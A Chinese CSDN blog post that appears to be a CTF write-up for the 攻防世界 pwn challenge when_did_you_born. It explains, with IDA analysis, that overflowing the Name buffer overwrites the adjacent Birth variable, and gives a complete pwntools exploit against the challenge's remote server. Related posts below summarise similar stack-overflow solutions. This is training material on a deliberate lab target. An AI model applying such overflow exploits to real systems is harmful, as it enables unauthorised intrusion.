攻防世界 when_did_you_born

最新推荐文章于 2024-07-12 10:31:01 发布

Nathan-Yang

最新推荐文章于 2024-07-12 10:31:01 发布

阅读量262

点赞数

分类专栏： pwn

本文链接：https://blog.csdn.net/u012890095/article/details/108848112

版权

博客介绍了攻防世界中的when_did_you_born题目，通过IDA反汇编分析C程序，揭示了程序流程。关键在于利用Name输入触发 Birth 变量溢出，当Birth等于1926时能获取flag。文章指出name和birth变量间有8个单元的间距，提供了exploit的思路。

摘要由CSDN通过智能技术生成

1.题目

2.IDA反汇编C程序

3.程序流程分析

首先输入Birth，如果Birth==1926直接退出；否则，输入Name，这时，判断Birth是否==1926.等于则get flag。

很明显，输入名字就是专门为我们提供溢出点的。两个变量的位置如下图：

0x20 - 0x18 = 0x8

也就是说name和birth之间间距8个单元。exp如下

from pwn import *

#io = process('./when_did_you_born')
io = remote('220.249.52.133', 42115)

io.recvuntil("Your Birth?")
io.sendline("1995")

payload = 'a' * 0x8  + p64(1926)
io.recvuntil('Your Name?')
io.sendline(payload)

io.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Nathan-Yang

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

【攻防世界pwn-cgpwn2】

a_silly_coder的博客

01-15

1461

下载文件后，首先检查保护：随后将文件拖入ida，查看源码，在hello函数中，发现了如下代码首先用安全的fgets输入了一个变量，接着用不安全的gets接收了一个变量，在此处可以确认是栈溢出，且溢出点就在此处。开始寻找利用方式，发现了system函数还缺一个"/bin/sh"字符串，找遍了代码，没有发现，但是由于此前可以有一个自己的输入，保存在name变量上，即可以自己手动输入"/bin/sh"，自此，设计栈结构为：开始编写脚本： from pwn imp...

[CTF-PWN]攻防世界新手村-when_did_you_born[wp]

murongxuege的博客

09-29

634

事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候，从头到尾刷一遍题，总结思路。题目分析开启场景后，服务端会开启对应的端口，并在端口上部署和附件相同的ELF二进制可执行文件，我们要做的就是下载附件并在本地进行反汇编，反编译等操作分析程序漏洞，从而利用漏洞获取题目的flag。从描述中可以看出当前程序是要进行年龄的输入操作的，有输入操作，还是在新手村，那么大概率是gets()等C函数输入漏洞，进一步猜测是普通的内存地址覆盖的题。 che

参与评论您还未登录，请先登录后发表或查看评论

[攻防世界]cgpwn2

逆向萌新的博客

06-11

403

[攻防世界]cgpw2n

攻防世界pwn——cgpwn2

qq_62076255的博客

11-05

337

攻防世界pwn——cgpwn2

[PWN](攻防世界)when_did_you_born

ljh15937的博客

09-17

191

分析程序漏洞通过 checksec 获取程序的基本信息 64位小端序开启了Canary，使用了栈不可执行技术使用 IDA Pro 对程序进行静态分析需要在第二次输入名字时覆盖第一次输入的年龄使用 GDB 动态调试程序可以发现第二次输入的名字就在第一次输入的年龄的前面，可以轻松将其覆盖成 1926 利用程序 from pwn import * context(arch = 'amd64') context(log_level = 'DEBUG') contex

攻防世界-cgpwn2

qq_45771413的博客

04-23

284

查看保护无栈保护，无PIE保护 IDA 两次输入，一个输入名字（限制了输入长度），一个输入信息（gets可以作栈溢出）解题思路 shift+f12查找字符串并没有发现/bin/sh，可能需要自己整，或者藏在某个变量里在找_system函数的过程中，发现了pwn命名的函数，进入发现有system调用，第一次做的时候看到system就乐了，直接溢出s，然后跳转到pwn地址，结果真就只有 hehehe …… 估计这是出题人的恶趣味…… 后来我在函数列表里找到了真正的_system，括号内的comma

攻防世界-pwn when_did_you_born（栈覆盖）

菜的只能随便写写博客

08-10

1408

0x01 拿到文件之后，先检查文件的基本信息文件信息 64bit elf可执行文件无PIE保护 0x02 执行文件文件之中有两个输入，第一个输入有回显 0x03 IDA静态分析可以看出获取flag需要用到v5的值，首先需要v5不等于1926，进入else这个块之中，然后又需要v5等于1926才能获取flag，就产生了矛盾。结合程序有两个输入，可以考...

攻防世界pwn when_did_you_born（栈溢出）

Haowill的博客

04-09

534

攻防世界pwn when_did_you_born（栈溢出）这是我第一次写博客，希望帮助到大家，感谢大家的支持。 pwn题做题步骤相信做这道题的同学们都是新手，或者是老手回来刷题。所以我这里会简单介绍我做pwn题的方法。一、下载程序到电脑这个就是下载到电脑里的样子。二、判断程序类型这个程序没有.exe后缀，所以它不是window的，它是linux的。在我们学习pwn的初期都是linux...

攻防世界pwn新手练习（when_did_you_born）

BurYiA的博客

09-16

586

when_did_you_born ok 多余的话就不继续累赘了昂，直接上手程序同上次一样开了NX(堆栈不可执行)和CANNARY(栈保护)

攻防世界 cgpwn2

最新发布

weixin_73399382的博客

07-12

1065

看到这fgets读取我们的输入到name中，因为程序没留shell，我们可以直接传入/bin/sh这个系统的默认shell，又因为下面使用gets从s中读取，我们可以使用让s溢出返回我们在name里面传入的默认/bin/sh。下面这个是利用plt查找system在got表中的地址，以后程序开启地址随机化的话函数的地址是变化的，就需要这么来找。s的内存空间+0处start到s需0x26字符，r是偏移指针到start处需0x4字符。system函数的地址我们刚才已经找到了，可以直接写脚本了。

攻防世界 Pwn cgpwn2

MrTreebook的博客

12-12

632

攻防世界 Pwn cgpwn21.题目下载地址2.checksec分析3.IDA分析3.1.看一下溢出大小4.exp4.1.运行结果 1.题目下载地址点击下载 2.checksec分析只开启了NX保护，应该不会有太多障碍直接进IDA看一下 3.IDA分析 main函数中有一个hello函数，我们直接看hello函数可以看到第二个gets函数没有限制输入大小，很明显是栈溢出再看看有没有其他后门函数看到有一个pwn函数中调用了system 而且第一个gets函数输入的name正好是处于bs

攻防世界_pwn_cgpwn2(萌新版)

TedLau的博客

02-24

393

首发于鄙人博客：传送门 0x00 前言省略file checksec，此两步大家都能够实现。 0x10 步骤 0x10 hello函数为32位文件，用32位ida打开后，可以发现如下hello函数在hello函数中我们可以发现，他让我们输入两块内容，一个是name，一个是some message。 0x11 _system函数而在左侧的函数栏中，我们可...

攻防世界cgpwn2

zyh18851473527的博客

08-05

903

首先checksec，之后放入IDA中点进hello 发现gets()函数可能会存在栈溢出，然后我们点进name 发现 name 地址是固定的，那我们可以它写入 bin/sh ，接着看能不能找到system 找到啦！所以这个题目的思路是：通过栈溢出漏洞，调用system函数，同时在name中写入"/bin/sh"，把参数地址设置为name的首地址，就可以getshell了！ gets() ...

攻防世界pwn新手练习（cgpwn2）

BurYiA的博客

03-26

532

题目链接分析我们来看这道题，首先checksec并运行一下可以看到是32位程序，有两个输入点，保护只有 NX。接下来我们在ida中看看分析。在hello函数的最后我们可以看到这些东西这就是程序给我们的两个输入点，可以看到第二个是 gets ，那就很方便了，直接溢出利用就行，翻看其他函数我们可以发现有一个system函数很遗憾的是只有system函数而没有我们需要的shellco...

攻防世界when_did_you_born

Deeeelete的博客

11-12

212

题目：when_did_you_born 拖进pe查看文件详情 checksec查看无PIE，堆栈不可执行，栈保护运行跑一遍逻辑进64位IDA调试 f5反编译main函数得到源码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __int64 result; // rax@4 __int64 v4; // rdx@9 char v5; // [sp+0h] [bp-20h]@5 unsig

攻防世界 - pwn - when_did_you_born

qq726232111的博客

03-16

186

A、程序分析 1、gets( 0 , rbp-20h ) -> rbp-20h 为缓冲区起始地址 2、[rbp-18h] ==786h -> 执行cat flag B、利用分析 1、构造payload通过gets()覆盖rbp-18h的内容 payload: 20h-19h(填充数据) + 18h-15h(0x0000786,判断条件) ...

攻防世界 - pwn - cgpwn2

qq726232111的博客

03-16

228

A、流程分析 1、将输入的用户名存储到全局变量 2、通过gets()获取留言信息 B、利用分析 1、gets( ebp-26h ) -> 26h(填充数据) + 4(ebp) + 4(返回地址) -> payload构造 2、可利用函数在pwn函数有system函数,可通过该地址调用系统命令 3、用户名使用的全局变...

攻防世界-wp-PWN-新手区-4-when_did_you_born

Scorpio_m7

02-18

1195

题目来源： CGCTF 题目描述：只要知道你的年龄就能获得flag，但菜鸡发现无论如何输入都不正确，怎么办题目场景： 111.198.29.45:47091 题目附件： 24ac28ef281b4b6caab44d6d52b17491 题目思路：这是一道很简单的栈溢出的题，当然首先你得懂函数调用时栈的原理，你还得学会通过pwntools编写简单的Python脚本，还得懂点Linux运行的机制、懂点IDA。栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数，因而导致与其相邻的

攻防世界guess_num

08-31

攻防世界guess_num是一个题目，它要求玩家猜测一个数字并输入。根据引用的结果"cyberpeace{a6473686121bdc644837b076c3207788}"，可以猜测这个题目的答案可能是"a6473686121bdc644837b076c3207788"。PIE和ASLR是一些防护技术，用于增加程序的安全性，防止恶意利用程序的特定漏洞进行攻击。PIE（position-independent executable）使得加载程序时每次都变换加载地址，防止ROP攻击。ASLR（Address Space Layout Randomization）则使得栈帧起始地址随机化，增加攻击者猜测需要攻击位置的难度。这些技术可以提高程序的安全性，减少被攻击的风险。123 #### 引用[.reference_title] - *1* *2* *3* [[攻防世界]guess_num](https://blog.csdn.net/m0_71081503/article/details/125075359)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]